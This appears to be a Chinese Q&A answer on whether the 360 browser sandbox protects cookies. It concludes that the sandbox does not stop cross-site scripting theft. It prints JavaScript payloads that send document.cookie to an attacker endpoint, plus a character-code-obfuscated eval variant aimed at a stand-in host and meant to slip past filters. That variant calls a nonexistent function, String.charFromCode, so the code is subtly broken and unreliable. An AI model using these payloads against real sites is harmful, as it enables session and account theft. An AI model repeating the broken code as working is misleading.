用360沙箱打开浏览器,会泄露cookies或浏览器中账户信息吗？

获取Cookie信息的主要途径：

1. 直接读取磁盘的Cookie文件，Windows系统的Cookie信息存放目录是C:/Documents and Settings/%yourname%/Cookies,FireFox的Cookie信息是在FireFox的Profiles目录中。

2. 使用网络嗅探器来获取网络上传输的Cookie

3. 使用一些Cookie管理工具获取内存或者文件系统中的cookie

4. 使用跨站脚本来盗取别人的cookie

使用浏览器泄露cookie的可能基本是最后一个，及跨站攻击。

360沙箱的原理是提供一个系统环境的副本并且将部分权限降低，沙箱内程序的所有操作新增文件, 修改文件, 注册表等都不是真正修改到系统，而是改到一个副本当中，这个副本对真实系统的正常程序是看不见的，关闭沙箱，这个副本就消失了，不会将其中的内容保存到本地。

而跨站攻击使用获取窃取Cookie的代码如下：

var x=new Image();x.src='/eatMoreCookies?c='

+document.cookie;

或者像下面这样：

document.write("〈 img src='/eatMoreCookies"+

"?c="+document.cookie+"'〉");

如果某些字符是禁止的，则将其转换为ASCII的十进制数，然后使用JavaScript的String.charFromCode()函数即可。下列JavaScript等价于前面的JavaScript：

eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,

97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,

97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,

101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,

100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));

只是从你的硬盘中读数据，但是没有存储，所以360的沙箱对防御跨站攻击的cookie是没有作用的